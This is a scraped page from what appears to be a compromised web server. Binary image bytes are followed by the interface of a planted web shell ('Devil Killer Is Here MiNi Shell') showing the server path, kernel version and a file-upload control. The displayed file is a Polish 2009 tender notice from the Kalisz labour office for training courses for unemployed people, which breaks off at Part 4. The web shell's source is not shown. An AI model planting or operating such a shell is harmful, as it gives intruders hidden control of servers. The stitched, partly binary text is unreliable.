JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090708/107981-N-2009.html

<p class="kh_header"><b>Kalisz: Przetarg nieograniczony na usługi szkoleniowe (wspólny słownik zamówień publicznych CPV kategoria 80420). Szkolenia realizowane w ramach projektu Skorzystaj z Szansy oraz Teraz My.</b><br>
<b>Numer ogłoszenia: 107981 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Kaliszu , ul. Stanisława Staszica 47A, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7689700, faks 062 7689790.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługi szkoleniowe (wspólny słownik zamówień publicznych CPV kategoria 80420). Szkolenia realizowane w ramach projektu Skorzystaj z Szansy oraz Teraz My..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkoleń dla osób bezrobotnych według podziału na następujące części zamówienia:1.1. KURS  OBSŁUGI KOMPUTERA I KASY FISKALNEJ dla 20 osób bezrobotnych, 1.2. KURS SPECJALISTY FINANSOWO - KSIĘGOWEGO dla 10 osób bezrobotnych, 1.3. KURS BUKIECIARZA dla 10 osób bezrobotnych, 1.4. KURS STYLISTKI PAZNOKCI KOSMETYCZKI dla 10 osób bezrobotnych, 1.5. KURS SEKRETARKI ASYSTENTKI SZEFA Z PODSTAWAMI JĘZYKA ANGIELSKIEGO dla 10 osób bezrobotnych, 1.6. KURS KELNER - BARMAN Z PODSTAWAMI JĘZYKA ANGIELSKIEGO dla 10 osób bezrobotnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.1 posiadają uprawnienia niezbędne do wykonywania szkoleń objętych zamówieniem,
1.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, legitymującymi się kwalifikacjami adekwatnymi do kierunku szkolenia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
1.4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
1.5 złożą formularz ofertowy wraz z wymaganymi dokumentami, załącznikami oraz zaświadczeniami,
1.6 wskażą część zamówienia, której wykonanie powierzą podwykonawcom lub oświadczą, że całość zamówienia wykonają samodzielnie,
1.7 przeprowadzą szkolenie na terenie miasta Kalisza, a w przypadku organizacji szkolenia poza Kaliszem pokryją koszty dowozu uczestników szkolenia z siedziby tut. Urzędu na miejsce szkolenia i z powrotem, środkiem transportu przeznaczonym wyłącznie na  potrzeby uczestników szkolenia lub zapewnią im pełne wyżywienie i zakwaterowanie w okresie trwania szkolenia. Koszty dowozu, zakwaterowania i wyżywienia należy wyodrębnić w formularzu ofertowym stanowiącym załącznik nr 6 do SIWZ,
1.8 pokryją koszty przeprowadzenia egzaminów,
1.9 przeprowadzą szkolenie, zgodnie z harmonogramem, w którym dzienna liczba godzin zajęć nie przekroczy 8 godzin zegarowych, przy czym zajęcia z zakresu aktywnego poszukiwania pracy i nauki języka angielskiego nie przekroczą 4 godzin zegarowych dziennie a zajęcia z zakresu obsługi komputera 6 godzin zegarowych dziennie, zgodnie z § 4, pkt. 3 umowy dotyczącej organizacji szkolenia, stanowiącej zał. nr 2 do SIWZ,(godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min oraz przerwę, liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny).
1.10 zajęcia nie będą odbywać się w soboty i niedziele oraz święta, zgodnie z § 4, pkt. 4 umowy dotyczącej organizacji szkolenia stanowiącej zał. nr 2 do SIWZ,
1.11 zapewnią każdego dnia szkolenia osobom skierowanym na szkolenie, catering w postaci: kawy, herbaty, wody mineralnej, ciastek oraz paluszków - zgodnie z § 4 pkt. 6 umowy dotyczącej organizacji szkolenia stanowiącej zał. nr 2 do SIWZ, 1.12. zapewnią osobom skierowanym na szkolenie odzież ochronną do zajęć praktycznych  w przypadku kursu wymienionego w  części II Przedmiot zamówienia, podpunkcie  1.6, zgodnie z § 4 pkt 15 umowy dotyczącej organizacji szkolenia, stanowiącej załącznik  nr 2 do SIWZ, 1.13.  zapewnią na własność osobom skierowanym na szkolenie materiały dydaktyczne zgodnie z § 4 pkt 16 umowy dotyczącej organizacji szkolenia, stanowiącej załącznik  nr 2 do SIWZ, 1.14. zapewnią uczestnikom szkolenia wyposażenie w postaci zeszytu/notatnika oraz długopisu, zgodnie z § 4 pkt 17 umowy dotyczącej organizacji szkolenia stanowiącej załącznik  nr 2 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków, o których mowa w pkt. 1 nastąpi na podstawie przedłożonych w ofercie oświadczeń i dokumentów, których wykaz określony został w części IV i V SIWZ. Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawców, o których mowa w art. 24 ust. 1, pkt. 1-10 ustawy Prawo zamówień publicznych oraz Wykonawców, którzy:
1 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego 
postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji, 
2. złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
3. nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 Ustawy PZP (Dz. U. z 2007r. Nr 223, poz. 1655 z późn. zm.).
Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający zawiadomi Wykonawców, którzy złożyli oferty, o wykluczeniu ich z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy oraz warunków określonych w punkcie III SIWZ, od Wykonawców ubiegających się o przyznanie zamówienia wymagane jest przedstawienie następujących dokumentów: 
1.1 zaświadczenia o wpisie podmiotu do ewidencji działalności gospodarczej albo aktualnego odpisu z Krajowego Rejestru Sądowego, albo innego właściwego dokumentu określającego rodzaj, zakres działalności i organy lub osoby upoważnione do występowania w imieniu Wykonawcy - zawierający wpis o prowadzeniu edukacji pozaszkolnej (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
1.2 oświadczenia dotyczącego zaktualizowania na rok 2009 wpisu do rejestru instytucji szkoleniowych (zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004 roku (Dz. U. Nr 236, poz. 2365), w sprawie rejestru instytucji szkoleniowych, które stanowi załącznik nr 3 do SIWZ, a w przypadku firm, które ubiegały się o wpis w roku 2009 - wpis do rejestru instytucji szkoleniowych,
1.3 zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że nie zalega z płaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.4 oświadczenia, wynikającego z postanowień art. 22 ust. 1 ustawy z dnia 29.01.2004r. - Prawo zamówień publicznych stanowiące załącznik nr 4 do SIWZ,
1.5 wykazu kadry prowadzącej każdy moduł szkolenia, według wzoru stanowiącego załącznik nr 5 do SIWZ, 1.6 oświadczenia dotyczącego udziału podwykonawców w wykonaniu zamówienia, stanowiące załącznik nr 10 do SIWZ, 1.7 oświadczenia dot. ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb szkolenia, wg wzoru stanowiącego załącznik nr 8 do SIWZ.
Dokumenty wymienione w podpunktach 1.1 - 1.3 mogą być złożone w formie oryginału lub kserokopii potwierdzonej za zgodność przez osobę(y) uprawnioną(e) do podpisywania oferty, z dopiskiem za zgodność z oryginałem , pozostałe muszą być złożone w formie oryginału.
2. Ponadto wykonawca zobowiązany jest złożyć wraz z ofertą: 
2.1 wypełniony i podpisany formularz ofertowy, stanowiący załącznik nr 6 do SIWZ,
2.2 wzór umowy, stanowiący załącznik nr 2 do SIWZ wraz ze wzorami załączników. Wzory dokumentów: umowy oraz załączników wymagają parafowania na każdej stronie,
2.3 w przypadku Wykonawców działających wspólnie (np. spółki cywilne) lub wspólnie ubiegających się o udzielenie zamówienia publicznego (np. konsorcja), do oferty należy dołączyć dokument ustanawiający pełnomocnika do reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo ustanawiające pełnomocnika powinno:
- jednoznacznie określać numer sprawy określonej w niniejszej specyfikacji,
- precyzować zakres pełnomocnictwa,
- zawierać nazwę części zamówienia (rodzaj szkolenia),
- zostać podpisane przez wszystkich Wykonawców lub osoby upoważnione do występowania w imieniu Wykonawcy,
2.4 program szkolenia według wzoru stanowiącego załącznik nr 7 do SIWZ,
2.5 wzór zaświadczenia o ukończonym szkoleniu, wydanego na podstawie rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach poza szkolnych /Dz. U. nr 31, poz. 216/ oraz innych dokumentów świadczących o nabytych umiejętnościach czy uprawnieniach.  
2.6 certyfikat  jakości i akredytację Kuratora bądź oświadczenie o braku tych dokumentów, 2.7 oświadczenie dot. zaangażowania w pozyskiwanie miejsc pracy dla przeszkolonych osób oraz dot. nadzoru wewnętrznego, wg wzoru stanowiącego załącznik nr 9 do SIWZ.
Dokumenty wymienione w punkcie 2 podpunktach  2.1 - 2.4 oraz 2.7 muszą być złożone w formie oryginału, natomiast dokumenty wymienione w punkcie 2 podpunktach 2.5 i 2.6 mogą być złożone w formie oryginału lub kserokopii potwierdzonej za zgodność przez osobę(y) uprawnioną(e) do podpisywania oferty z dopiskiem za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Zakres i jakość oferowanych programów szkoleń w tym wykorzystywanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych oraz - 30</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 10</li>
<li>4 - Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpieczny - 5</li>
<li>5 - Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
<li>7 - Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup.kalisz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Kaliszu, ul. Staszica 47a, 62-800 Kalisz, pok. nr 123 I piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2009 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Kaliszu ul. Staszica 47a, 62-800 Kalisz, pok. nr 123 I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 17.08.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia realizowane będą w ramach projektów Skorzystaj z Szansy oraz Teraz My finansowanych z Funduszu Pracy..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KURS OBSŁUGI KOMPUTERA I KASY FISKALNEJ            dla 20 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BLOK ZAWOODOWY
Program szkolenia musi zawierać między innymi następujące zagadnienia:
-  obsługę edytora tekstu WORD,
- obsługę arkusza kalkulacyjnego EXCEL
- obsługę Internetu i poczty elektronicznej,
- korzystanie z systemu WINDOWS,
- obsługę kasy fiskalnej.
Wymagana ilość godzin:
- teoretycznych - 0 
- praktycznych  - 82
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 2 grupach 10 osobowych)
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
BLOK AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 2 grupach 10 osobowych)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 2 grupach 10 osobowych)
Czas trwania szkolenia:  maksymalnie 3 tygodnie we wrześniu 2009r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 3 tygodni..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Zakres i jakość oferowanych programów szkoleń w tym wykorzystywanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych oraz - 30</li>
<li>3. Kwalifikacje kadry dydaktycznej - 10</li>
<li>4. Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpieczny - 5</li>
<li>5. Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
<li>7. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS SPECJALISTY FINANSOWO - KSIĘGOWEGO dla  10 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BLOK ZAWODOWY:
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- regulacje prawne dotyczące rachunkowości,
- podstawowe zasady prowadzenia rachunkowości,
- funkcjonowanie kont księgowych,
- ewidencję operacji gospodarczych,
- ewidencję obrotu gotówkowego i bezgotówkowego,
- obsługę programu SYMFONIA,
- obsługę programu PŁATNIK,
- ewidencję majątku, towarów, materiałów i usług;
- sprawozdawczość finansową,
- rozrachunki z Urzędem Skarbowym,
- rozrachunki z ZUS
Wymagana ilość godzin:
- teoretycznych - 52
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych  - 180 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
BLOK AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia: maksymalnie 8 tygodni przypadających w okresie II połowa sierpnia - październik 2009r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 8  tygodni..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.04-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Zakres i jakość oferowanych programów szkoleń w tym wykorzystywanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych oraz - 30</li>
<li>3. Kwalifikacje kadry dydaktycznej - 10</li>
<li>4. Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpieczny - 5</li>
<li>5. Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
<li>7. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS BUKIECIARZA dla 10 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BLOK ZAWODOWY:
Program szkolenia musi zawierać między innymi następujące zagadnienia
- zasady doboru kwiatów do kompozycji,
- wykonywanie bukietów  i kompozycji   okolicznościowych: ślubnych, komunijnych i pogrzebowych,
- przygotowywanie materiałów roślinnych i nieroślinnych do ekspozycji i wykonywania różnego rodzaju wyrobów florystycznych.
Wymagana ilość godzin:
- teoretycznych - 10
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych  - 72
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
BLOK PRZEDSIĘBIORCZOŚCI
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- sporządzanie biznesplanu,
- rejestrowanie działalności,
- marketing małej firmy,
- obsługa programu Płatnik i rozliczenia z ZUS,
- formy opodatkowania i rozliczenia z Urzędem Skarbowym
Wymagana ilość godzin :
- teoretycznych - 10
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych - 20
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej )
Wymagane jest jedno stanowisko komputerowe dla jednej osoby. 
BLOK AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia:  maksymalnie 4 tygodnie przypadające w okresie październik - listopad 2009r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 4 tygodni..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Zakres i jakość oferowanych programów szkoleń w tym wykorzystywanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych oraz - 30</li>
<li>3. Kwalifikacje kadry dydaktycznej - 10</li>
<li>4. Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpieczny - 5</li>
<li>5. Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
<li>7. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KURS STYLISTKI PAZNOKCI KOSMETYCZKI dla 10 osób bezrobotnych.</p>
